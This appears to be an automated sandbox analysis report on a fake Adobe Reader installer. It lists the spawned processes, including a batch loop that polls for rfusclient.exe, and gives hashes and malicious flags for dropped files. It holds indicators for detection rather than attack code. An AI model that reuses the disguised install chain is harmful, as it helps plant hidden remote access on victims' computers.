CDaNsQ7Rrd.exe (PID: 2560 cmdline: 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='2404Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='2404' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_RESUME='1' TARGETDIR='C:\' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' APPDIR='C:\Program Files\Adobe\Adobe Reader\' MD5: EDA8E4F2DF81E0BA5B88D73DE9779205)

msiexec.exe (PID: 2396 cmdline: C:\Windows\system32\MsiExec.exe -Embedding 2EDF85C04E0081D90ED7293C0FDDF85C C MD5: 4315D6ECAE85024A0567DF2CB253B7B0)

msiexec.exe (PID: 2420 cmdline: C:\Windows\system32\MsiExec.exe -Embedding F7FCF8C7FA5995D0F2A8BA3C03B96EE9 MD5: 4315D6ECAE85024A0567DF2CB253B7B0)

armforce.exe (PID: 1532 cmdline: 'C:\inst_fold\armforce.exe' C:\inst_fold\armstatus.bat MD5: 9245B8EC3D40D640E5CF5183F49CE2F6)

cmd.exe (PID: 1032 cmdline: 'C:\Windows\System32\cmd.exe' /c 'C:\inst_fold\armstatus.bat' MD5: AD7B9C14083B52BC532FBA5948342B98)

tasklist.exe (PID: 1928 cmdline: tasklist /FI 'USERNAME eq user' MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

find.exe (PID: 3500 cmdline: find /I /C 'rfusclient.exe' MD5: 5816034B0B629756163B80838853B730)

timeout.exe (PID: 1236 cmdline: timeout 3 /nobreak MD5: 419A5EF8D76693048E4D6F79A5C875AE)

tasklist.exe (PID: 1284 cmdline: tasklist /FI 'USERNAME eq user' MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

find.exe (PID: 4012 cmdline: find /I /C 'rfusclient.exe' MD5: 5816034B0B629756163B80838853B730)

timeout.exe (PID: 2312 cmdline: timeout 3 /nobreak MD5: 419A5EF8D76693048E4D6F79A5C875AE)

tasklist.exe (PID: 1580 cmdline: tasklist /FI 'USERNAME eq user' MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

find.exe (PID: 1904 cmdline: find /I /C 'rfusclient.exe' MD5: 5816034B0B629756163B80838853B730)

timeout.exe (PID: 3324 cmdline: timeout 3 /nobreak MD5: 419A5EF8D76693048E4D6F79A5C875AE)

tasklist.exe (PID: 3756 cmdline: tasklist /FI 'USERNAME eq user' MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

find.exe (PID: 3052 cmdline: find /I /C 'rfusclient.exe' MD5: 5816034B0B629756163B80838853B730)

timeout.exe (PID: 244 cmdline: timeout 3 /nobreak MD5: 419A5EF8D76693048E4D6F79A5C875AE)

tasklist.exe (PID: 448 cmdline: tasklist /FI 'USERNAME eq user' MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

find.exe (PID: 2224 cmdline: find /I /C 'rfusclient.exe' MD5: 5816034B0B629756163B80838853B730)

timeout.exe (PID: 2292 cmdline: timeout 3 /nobreak MD5: 419A5EF8D76693048E4D6F79A5C875AE)

tasklist.exe (PID: 3612 cmdline: tasklist /FI 'USERNAME eq user' MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

find.exe (PID: 2308 cmdline: find /I /C 'rfusclient.exe' MD5: 5816034B0B629756163B80838853B730)

timeout.exe (PID: 2512 cmdline: timeout 3 /nobreak MD5: 419A5EF8D76693048E4D6F79A5C875AE)

tasklist.exe (PID: 732 cmdline: tasklist /FI 'USERNAME eq user' MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

find.exe (PID: 1580 cmdline: find /I /C 'rfusclient.exe' MD5: 5816034B0B629756163B80838853B730)

timeout.exe (PID: 3404 cmdline: timeout 3 /nobreak MD5: 419A5EF8D76693048E4D6F79A5C875AE)

tasklist.exe (PID: 3736 cmdline: tasklist /FI 'USERNAME eq user' MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

find.exe (PID: 3488 cmdline: find /I /C 'rfusclient.exe' MD5: 5816034B0B629756163B80838853B730)

timeout.exe (PID: 3156 cmdline: timeout 3 /nobreak MD5: 419A5EF8D76693048E4D6F79A5C875AE)

tasklist.exe (PID: 2680 cmdline: tasklist /FI 'USERNAME eq user' MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

find.exe (PID: 2136 cmdline: find /I /C 'rfusclient.exe' MD5: 5816034B0B629756163B80838853B730)

timeout.exe (PID: 2564 cmdline: timeout 3 /nobreak MD5: 419A5EF8D76693048E4D6F79A5C875AE)

tasklist.exe (PID: 2244 cmdline: tasklist /FI 'USERNAME eq user' MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

find.exe (PID: 2112 cmdline: find /I /C 'rfusclient.exe' MD5: 5816034B0B629756163B80838853B730)

timeout.exe (PID: 2832 cmdline: timeout 3 /nobreak MD5: 419A5EF8D76693048E4D6F79A5C875AE)

tasklist.exe (PID: 2256 cmdline: tasklist /FI 'USERNAME eq user' MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

find.exe (PID: 1152 cmdline: find /I /C 'rfusclient.exe' MD5: 5816034B0B629756163B80838853B730)

timeout.exe (PID: 3432 cmdline: timeout 3 /nobreak MD5: 419A5EF8D76693048E4D6F79A5C875AE)

tasklist.exe (PID: 2984 cmdline: tasklist /FI 'USERNAME eq user' MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

find.exe (PID: 3040 cmdline: find /I /C 'rfusclient.exe' MD5: 5816034B0B629756163B80838853B730)

timeout.exe (PID: 3444 cmdline: timeout 3 /nobreak MD5: 419A5EF8D76693048E4D6F79A5C875AE)

tasklist.exe (PID: 2668 cmdline: tasklist /FI 'USERNAME eq user' MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

find.exe (PID: 2484 cmdline: find /I /C 'rfusclient.exe' MD5: 5816034B0B629756163B80838853B730)

timeout.exe (PID: 2392 cmdline: timeout 3 /nobreak MD5: 419A5EF8D76693048E4D6F79A5C875AE)

tasklist.exe (PID: 2408 cmdline: tasklist /FI 'USERNAME eq user' MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

find.exe (PID: 2188 cmdline: find /I /C 'rfusclient.exe' MD5: 5816034B0B629756163B80838853B730)

timeout.exe (PID: 3868 cmdline: timeout 3 /nobreak MD5: 419A5EF8D76693048E4D6F79A5C875AE)

tasklist.exe (PID: 1456 cmdline: tasklist /FI 'USERNAME eq user' MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

find.exe (PID: 1792 cmdline: find /I /C 'rfusclient.exe' MD5: 5816034B0B629756163B80838853B730)

timeout.exe (PID: 272 cmdline: timeout 3 /nobreak MD5: 419A5EF8D76693048E4D6F79A5C875AE)

tasklist.exe (PID: 3776 cmdline: tasklist /FI 'USERNAME eq user' MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

find.exe (PID: 3828 cmdline: find /I /C 'rfusclient.exe' MD5: 5816034B0B629756163B80838853B730)

timeout.exe (PID: 3904 cmdline: timeout 3 /nobreak MD5: 419A5EF8D76693048E4D6F79A5C875AE)

tasklist.exe (PID: 3648 cmdline: tasklist /FI 'USERNAME eq user' MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

find.exe (PID: 4016 cmdline: find /I /C 'rfusclient.exe' MD5: 5816034B0B629756163B80838853B730)

timeout.exe (PID: 580 cmdline: timeout 3 /nobreak MD5: 419A5EF8D76693048E4D6F79A5C875AE)

tasklist.exe (PID: 2548 cmdline: tasklist /FI 'USERNAME eq user' MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

find.exe (PID: 2808 cmdline: find /I /C 'rfusclient.exe' MD5: 5816034B0B629756163B80838853B730)

timeout.exe (PID: 3580 cmdline: timeout 3 /nobreak MD5: 419A5EF8D76693048E4D6F79A5C875AE)

tasklist.exe (PID: 2112 cmdline: tasklist /FI 'USERNAME eq user' MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

find.exe (PID: 3084 cmdline: find /I /C 'rfusclient.exe' MD5: 5816034B0B629756163B80838853B730)

timeout.exe (PID: 2656 cmdline: timeout 3 /nobreak MD5: 419A5EF8D76693048E4D6F79A5C875AE)

tasklist.exe (PID: 3236 cmdline: tasklist /FI 'USERNAME eq user' MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

find.exe (PID: 3592 cmdline: find /I /C 'rfusclient.exe' MD5: 5816034B0B629756163B80838853B730)

timeout.exe (PID: 1920 cmdline: timeout 3 /nobreak MD5: 419A5EF8D76693048E4D6F79A5C875AE)

tasklist.exe (PID: 3668 cmdline: tasklist /FI 'USERNAME eq user' MD5: A9A00E71E3DD67B029FC904FE3BB61DA)

find.exe (PID: 412 cmdline: find /I /C 'rfusclient.exe' MD5: 5816034B0B629756163B80838853B730)

timeout.exe (PID: 2192 cmdline: timeout 3 /nobreak MD5: 419A5EF8D76693048E4D6F79A5C875AE)

explorer.exe (PID: 2168 cmdline: C:\Windows\explorer.exe /factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

cleanup

Created / dropped Files

C:\Users\HERBBL~1\AppData\Local\Temp\$inst\0001.tmp
Process:	C:\inst_fold\fp.exe
File Type:	Microsoft Cabinet archive data, 4295366 bytes, 4 files
Size (bytes):	4295366
Entropy (8bit):	7.999945658772637
Encrypted:	true
MD5:	CAB49C9A9A736317337FE877343483D6
SHA1:	C2AFC29CED8833786C7B8147DFD5CADED1B566B3
SHA-256:	9F726F48895110CEE07F50E7CB5E85FED787C579C8A77F772B086BCC0FC0CA94
SHA-512:	70A52CA568C88A3B44E46CB2297E2DAE7461B569FE5CD0C7AA44D469AF1E731B4E12CCC5AB6B6E695BD7733D263E52897DF15A15B0613F03962E4A90A194A19D
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\$inst\2.tmp
Process:	C:\inst_fold\fp.exe
File Type:	Microsoft Cabinet archive data, 36 bytes
Size (bytes):	36
Entropy (8bit):	1.3753156176197312
Encrypted:	false
MD5:	8708699D2C73BED30A0A08D80F96D6D7
SHA1:	684CB9D317146553E8C5269C8AFB1539565F4F78
SHA-256:	A32E0A83001D2C5D41649063217923DAC167809CAB50EC5784078E41C9EC0F0F
SHA-512:	38ECE3E441CC5D8E97781801D5B19BDEDE6065A0A50F7F87337039EDEEB4A22AD0348E9F5B5542B26236037DD35D0563F62D7F4C4F991C51020552CFAE03B264
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\$inst\temp_0.tmp
Process:	C:\inst_fold\fp.exe
File Type:	Microsoft Cabinet archive data, 8388612 bytes, 6 files
Size (bytes):	8388612
Entropy (8bit):	7.999971691727602
Encrypted:	true
MD5:	9AE575F6A34E8871A32C43471D9D13D8
SHA1:	3E351EB6C1345F89A8B35DF0422A393B69452AC9
SHA-256:	567E249593DFC9D38FE100AC65AB61354DB4DF1A2C0CF2C98F238F73B86FEF05
SHA-512:	9B4F71058FB39EC445F9362A5B91515D44795583254E346CD1F358164C0085812DD67C5986DC42E30AC3A93E628962E6D9FC4DD5CFF6F9B26C6C3572B5BAAE1F
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\7ZipSfx.000\host6.8_unsigned.msi
Process:	C:\inst_fold\armstart.exe
File Type:	Intel;1033
Size (bytes):	9695232
Entropy (8bit):	7.914971093371049
Encrypted:	false
MD5:	D5E65D9A0BDBAE81A53C7529D8D84EBE
SHA1:	0DED26345926FAF919F9C8985E8B7B9F8E9C1B93
SHA-256:	A15C9DE7714DDA314144535BB4D3EB34AB240BFAEAAE9A7B755A2211E2D96B68
SHA-512:	23C4A9CF8D91A073BF44ABEED35568D63D9A9D9A31D2156B48C51C7025F3513901D685604583A7E57040A480D5397FDE61A3E9A94A12E7F238EA43D005894CA9
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\7ZipSfx.000\installer.exe
Process:	C:\inst_fold\armstart.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):	9956368
Entropy (8bit):	6.733430597874706
Encrypted:	false
MD5:	3C5850EF227BB206E507551C471EE8DF
SHA1:	8943AAB98043F28918A0C8D31D7A0076B5BFFB1C
SHA-256:	A803BD4522EC8804ADF5E548B2FFC9E3AFA7EEE179D96945DE1A5980B5616445
SHA-512:	AA94ACE9F008EEFF257505239A7A04EADA728461E7D732E227815C880B6EC758B63B2DC576AF425489B661D5DE23D002FF14121C8E0165FAE9FD127404EB2F1A
Malicious:	true
Antivirus:	Antivirus: virustotal, Detection: 9%, Browse Antivirus: metadefender, Detection: 6%, Browse

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\New
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	MS Windows icon resource - 1 icon
Size (bytes):	318
Entropy (8bit):	2.0344415800551814
Encrypted:	false
MD5:	C23CBF002D82192481B61ED7EC0890F4
SHA1:	DD373901C73760CA36907FF04691F5504FF00ABE
SHA-256:	4F92E804A11453382EBFF7FB0958879BAE88FE3366306911DEC9D811CD306EED
SHA-512:	5CC5AD0AE9F8808DEA013881E1661824BE94FB89736C3CB31221E85BE1F3A408D6E5951ACCD40EE34B3BAF76D8E9DD8820D61A26345C00CDDC0A884375EE1185
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\Prereq.dll
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	302208
Entropy (8bit):	6.337378319954948
Encrypted:	false
MD5:	B831569A917E0E543FCCDF3672C7A10E
SHA1:	DF1E395DC41AB8D1AE9401E4D2181FDFA24623CD
SHA-256:	E2D7938BEA1174359BAC78D610678BA586DB58FAB70901BA287623560A9A9FE6
SHA-512:	4C2DDEADF6D94D2CDD34EE307E7D88264C61BE051DB12E68E12F1132A2BB0D4ADC9CD405C5923ECD8B4C885079E06A2B7402196CAD21FDE11EB8D1E7E8ADA627
Malicious:	true
Antivirus:	Antivirus: virustotal, Detection: 0%, Browse

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\Up
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	MS Windows icon resource - 1 icon
Size (bytes):	318
Entropy (8bit):	2.0369361465218
Encrypted:	false
MD5:	83730AC00391FB0F02F56FE2E4207A10
SHA1:	139FED8F0216132450E66BDA0FBBDC2A5BD333AF
SHA-256:	573E3260EED63604F24F6F10CE5294E25E22FDA9E5BFD9010134DE6E684BAB98
SHA-512:	E3DBE1956BB743FD68319517D1D993DDA316C12BBBBBBD6F582ECDD60C4FDE24CC4814C7AB36ED571F720349931EAC10B03E9C911BA0F4309B10604B2C56C6A9
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\aicustact.dll
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	92800
Entropy (8bit):	6.179880794142425
Encrypted:	false
MD5:	6A9C36332255FCA66C688C75AA68E1DE
SHA1:	2A03E2A5E6A8D9E2B0CFB4E2CC1923D9C08578C1
SHA-256:	7B7EBADA5DA99A20C44EAF77E6D673985DA42D9B7CB4F5E4235B7579581AE170
SHA-512:	A638C48026F2A0B565B34D7D0DFACFEC4F582E698F88234521A6FCFF1ED90C134F39AA3311CCA2A67E401DE01F81CAC01D9F792F189127E0F87A345076827627
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\aipackagechainer.exe
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):	280576
Entropy (8bit):	6.212263480310817
Encrypted:	false
MD5:	B4F05778C1E9BCF0BCBF0733FD6C763B
SHA1:	E0F0A2CF06ED43581FED238ABA71EB8BAD82CBEA
SHA-256:	1D6D2D7E16F333759348D331D69B0A5A7E135F4BB9D3615EDC59E305341324EA
SHA-512:	20423A3B3817D7E2D4D4F5E882837036824001938E87D645756FCD708290406DFCDE410F1D8017E88C4F0D9CEE068A53088A6B11100C9213AE22264A899CD64E
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\background.jpg
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	JPEG image data, JFIF standard 1.02
Size (bytes):	35778
Entropy (8bit):	7.943826171174218
Encrypted:	false
MD5:	C12B97D5A230A72970B0947FFD1D2CE1
SHA1:	F5AA3204EE60F34D736303DBF61F7342F95EAAB2
SHA-256:	8DFA97D18ACAEAA0ED13A43CCA6802D5C3637EAD536991915AC3D88636BA08D5
SHA-512:	CC7DF1BCF4A8EE24BAD3A148783B5C0B447DDA62E74EF0C39D16473C0362B2710360F42B576E22A1FB7FF57D885DE5133A79704A11AF7FBE92E790D70F4A87ED
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\cmdlinkarrow
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	MS Windows icon resource - 3 icons, 16x16, 16-colors
Size (bytes):	2862
Entropy (8bit):	3.160430651939096
Encrypted:	false
MD5:	983358CE03817F1CA404BEFBE1E4D96A
SHA1:	75CE6CE80606BBB052DD35351ED95435892BAF8D
SHA-256:	7F0121322785C107BFDFE343E49F06C604C719BAFF849D07B6E099675D173961
SHA-512:	BDEE6E81A9C15AC23684C9F654D11CC0DB683774367401AA2C240D57751534B1E5A179FE4042286402B6030467DB82EEDBF0586C427FAA9B29BD5EF74B807F3E
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\collecting.jpg
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	JPEG image data, JFIF standard 1.02
Size (bytes):	1790
Entropy (8bit):	7.625556970420797
Encrypted:	false
MD5:	9A740549BD117BC16F6ACB8D884604D2
SHA1:	DA20E48ACDE3A7097F8335541DE40FE94C600E0A
SHA-256:	0DAED44A8E14750614AFDA54781621D400FED0D2ECEE9A4A402F5964D3CD3F5A
SHA-512:	3DA47437F97E28B4F7FBB0ABFF44A4811B96D8511AC736DABD24B598A98B274A2E8FB9C9475A08DE3478CD41683BA60DB771CE409E2ABA2799F866EC813A3E1E
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\completeex.ico
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	MS Windows icon resource - 3 icons, 48x48, 16-colors
Size (bytes):	15086
Entropy (8bit):	5.432735724336821
Encrypted:	false
MD5:	3EAFE3AE99BF33E9F59D970F21EBEF39
SHA1:	E9895CB920FDEB8907CE37D9666D4999A1DE5D2F
SHA-256:	5F6C78970EE7E3D668EB8A4ACB5D251C76599424A0B0372E7665527516D4C312
SHA-512:	8983717D464AC046A8A272276E90D3D1FD7900D2D89998FC332E420ECA4F01FCFBABB390667B4324C549D0655E62E181E3E7BEED514C5B9B67D0F8D480A9388D
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\customex.ico
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	MS Windows icon resource - 3 icons, 48x48, 16-colors
Size (bytes):	15086
Entropy (8bit):	5.4001074083138745
Encrypted:	false
MD5:	1B5701D7F753135C22CC1AE694FFAF4B
SHA1:	966BDEF4159022FCC8740B6EB75B8D7AC4212504
SHA-256:	AEBA695175ED96D3EDE9FE30E486DF59C64A5FD802C15CB67F55E03A0537CD13
SHA-512:	4069B6AC1E51703687E0C17EA83527A258FF0C4BB4DC8051C96E5F98A7902C3301B89A5D2B55872711F85F528B0FB9BAEAF94E93B49B0A48BB8912E06A204EAC
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\exclamation.ico
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	MS Windows icon resource - 2 icons, 48x48, 256-colors
Size (bytes):	13430
Entropy (8bit):	4.339511276304085
Encrypted:	false
MD5:	93D722FA20A988A5C257A58BF155DC66
SHA1:	30C0D19F02CB39F8804DAFE6AF483A09C76E2338
SHA-256:	F587867EED0BEC33EF150F3A8525BDE9B6746C705543874E56653AA80EA53225
SHA-512:	BFB91739AE7432DD7D0A919F15B5B721E733675C3C2A4D5238C9955A6517DD4653042FA444F2D2627508908F6DA7DE0FBF22F37CF1A60476F59CBF254F62F736
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\finalizing.jpg
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	JPEG image data, JFIF standard 1.02
Size (bytes):	1701
Entropy (8bit):	7.587567657324339
Encrypted:	false
MD5:	02F6BBE060F32E49E3CAF2DE8E60EC7F
SHA1:	4674875A4F264A947DA6BF6F626B9BD50325D034
SHA-256:	20072AE2E122A6407DAC4771544158D7BCECEBF98404C22001B0E69F79C8580D
SHA-512:	DAAADBF113AF1AF0315333089E8B6FF4891D1FE0FA95E5ECAEAF763DA593BCB4A8E1A1A940F44A3A5B6E22A9296CAB1FA56E4D533CD938F434B565D6323FB588
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\info
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	MS Windows icon resource - 2 icons, 32x32, 16-colors
Size (bytes):	1078
Entropy (8bit):	2.8642269548572474
Encrypted:	false
MD5:	554FF4C199562515D758C9ABFF5C2943
SHA1:	9E3BAB3A975E638EAD9E03731AE82FA1DBCD178C
SHA-256:	9AE4A96BF2A349667E844ACC1E2AC4F89361A6182268438F4D063DF3A6FC47BC
SHA-512:	E302EDF3DAB3A0E9EEB5AFA34E4910EE177099C017B42F86847CF972143C87E8C40BC47689A3C8845051EAB98258A392CCAF331F414C271A1B6B751F503CE221
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\infoex.ico
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	MS Windows icon resource - 6 icons, 48x48, 256-colors
Size (bytes):	22486
Entropy (8bit):	5.511908704029649
Encrypted:	false
MD5:	FD535E63F539EACB3F11D03B52B39A80
SHA1:	A7F8C942E5672F2972C82210A38CC8861435F643
SHA-256:	0086BC01150989F553A0A4AE0E14926C6E247CEDDA312E1F946AE35D575742AB
SHA-512:	716EAB95B5535D54359D12C9786F5A53F9560126D2C48EB1A94DB5BD383363B43EA686AC421080564B54450DA35AF9CE3E11CECD485AAF27C0CEAEE7836F4518
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\installing.jpg
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	JPEG image data, JFIF standard 1.02
Size (bytes):	1794
Entropy (8bit):	7.61906650791519
Encrypted:	false
MD5:	A98E2F7D5DC055AD4B4B6D92126D9190
SHA1:	C2DB85DCF7BF991E8BBA0D39F952748DC98D41D6
SHA-256:	65751616EDB29437B01CD352B8651835CA585942A78ADAAC589F9F8C16039470
SHA-512:	C10AA6FE00361AB2FD6D78496FD20CB2361F235563156D4C41EC6E2E86207C964CDC3B303B927FC64A3FE86D4F5930C0C775E8D0E213F0D63A79F22133128FEA
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\lzmaextractor.dll
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	12416
Entropy (8bit):	6.147935614181273
Encrypted:	false
MD5:	6A06D2405B81845330AE5C97B31D2663
SHA1:	75293A2C50528D86197976A1A74BEB97A6202A65
SHA-256:	6E0F72297A10EB38593FAF6D52CE964C45873F2E2F4FDCF468FB592FB763851C
SHA-512:	6E42165A176943512D0BD5BB7C5AC4E346291FA9082831435D59DE97859AC0D1F3FDD1BB8AC2BD08B24A634FA484F19B448D42C96C319E0DA5C90FABD7D55F05
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\minbackground.jpg
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	JPEG image data, JFIF standard 1.02
Size (bytes):	8955
Entropy (8bit):	7.924419497502312
Encrypted:	false
MD5:	EC713B6158A057B7825274AE4E1CF183
SHA1:	C8178CF6A46E14E82F4EBDE407FF04FF931CA7DD
SHA-256:	04942FB23C0FB15AA732881C411FD2B4F44A621267E2C1DE182C39B014A87211
SHA-512:	59D90C027C5D06338F8C410EA971961FBB6990394FF929A7CB5EC664901F9819566D0ABC1123A0B4F3730792D8CB30FB7FD4E3AB5A4154C9F41DCB00C4DDED9A
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\preparing.jpg
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	JPEG image data, JFIF standard 1.02
Size (bytes):	1799
Entropy (8bit):	7.627751600207026
Encrypted:	false
MD5:	D20270537AE700B03B988FC7471C820E
SHA1:	3B68B1BE0A7D30DF6ED8952C34794E90102B77DF
SHA-256:	A8C29D7365A7ED4191B20D08BE6274215F5F12BE420E826852205C4F3755DBB4
SHA-512:	F8245BFF51757D1D44F4DA5DECE49F6B96D704E72A2B6D2EDFA517029A69EB410CDEA3945A2C3C29A32E6E9E0CB1A0B0938C4F7D3711446EC963913B4E6A3780
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\removeex.ico
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	MS Windows icon resource - 3 icons, 48x48, 16-colors
Size (bytes):	15086
Entropy (8bit):	3.6742809399919576
Encrypted:	false
MD5:	AA0A5F0280C98006741B6CB56C3A360E
SHA1:	AC820BBEC6D08545A4A4818DF9EB09B521BF2E40
SHA-256:	2AC61CEA48CCDB1751CB6B93BA90267508ED6AC900B2E2AC6EAD172C9B8958F2
SHA-512:	7646B3786039711FD60BD9C82A2CBAC51CAA75626CD1695F29EF4939637F60118F6B32B6B781EC57D6F478091C33DC886B2B6C3751B948CD0E916E617C52B254
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\repairex.ico
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	MS Windows icon resource - 3 icons, 48x48, 16-colors
Size (bytes):	15086
Entropy (8bit):	5.656471862600903
Encrypted:	false
MD5:	4DBA3637F5FCEAADD2184BD8A0F0FB95
SHA1:	A858418C32F5D45F15AB01CAFC652B507DE2A42B
SHA-256:	C1AD1E78A112974326B44F75FE302723A4FC8AC1CCD96C9887403F6DDF8E607D
SHA-512:	DA105188273312DD1C79D90C2A1AE17ED584A70C14BCD662EAB3B7FC99D7A91B30957D965498E6FB397E01EA72ED3EA0AB8BDBB4313E68E8E45073B87E412E26
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\tabback
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	PC bitmap, Windows 3.x format, 1 x 200 x 24
Size (bytes):	854
Entropy (8bit):	3.802531598764924
Encrypted:	false
MD5:	4C3DDA35E23D44E273D82F7F4C38470A
SHA1:	B62BC59F3EED29D3509C7908DA72041BD9495178
SHA-256:	E728F79439E07DF1AFBCF03E8788FA0B8B08CF459DB31FC8568BC511BF799537
SHA-512:	AB27A59ECCDCAAB420B6E498F43FDFE857645E5DA8E88D3CFD0E12FE96B3BB8A5285515688C7EEC838BBE6C2A40EA7742A9763CF5438D740756905515D9B0CC5
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\typicalex.ico
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	MS Windows icon resource - 3 icons, 48x48, 16-colors
Size (bytes):	15086
Entropy (8bit):	4.926016576393048
Encrypted:	false
MD5:	EB3F9054BB5F95ED6B10EC4E16A026BE
SHA1:	35760271A03029996BDA26D5D596CFCC465E3EA9
SHA-256:	E330FA8030AA0465B02880133ADDBA0A8C6011B511F6968B413BF45516F7275E
SHA-512:	B0A96DA5514A9B8E9FA182A294694299388A854245AEC01E835B1108D568F9F1158917D9792BC852568EC56C2ED5E54F9E630E02D1EC79A281E2B28A67167A51
Malicious:	false

C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\white.jpg
Process:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
File Type:	JPEG image data, JFIF standard 1.02
Size (bytes):	1232
Entropy (8bit):	1.290282383283862
Encrypted:	false
MD5:	57D130DDF327FCC5DA636A6AB4D7C112
SHA1:	D674F332D4F79C70D4A97BFD9E504A8F3A2C26B6
SHA-256:	990EAB9FAAAE9F78201EF00A72F7B59773EED2B2FC9EC72250C67F376EE0500F
SHA-512:	E2F2141973CD9B7B52347EBCC89E89FDDEAA5B9721011C2CD7B2F2EAE434EF0F10D02537EB0F1AD6276FA182147AE935277EF9BBE31960EE2D82437C0741D39D
Malicious:	false

